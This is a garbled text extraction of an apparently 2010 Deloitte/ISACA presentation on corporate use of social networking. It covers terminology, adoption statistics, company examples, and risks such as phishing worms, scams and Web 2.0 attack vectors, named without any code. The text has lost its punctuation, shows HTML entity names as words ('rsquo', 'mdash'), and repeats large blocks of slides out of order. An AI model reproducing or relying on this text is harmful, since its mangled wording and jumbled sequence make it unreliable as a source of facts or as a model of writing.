Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
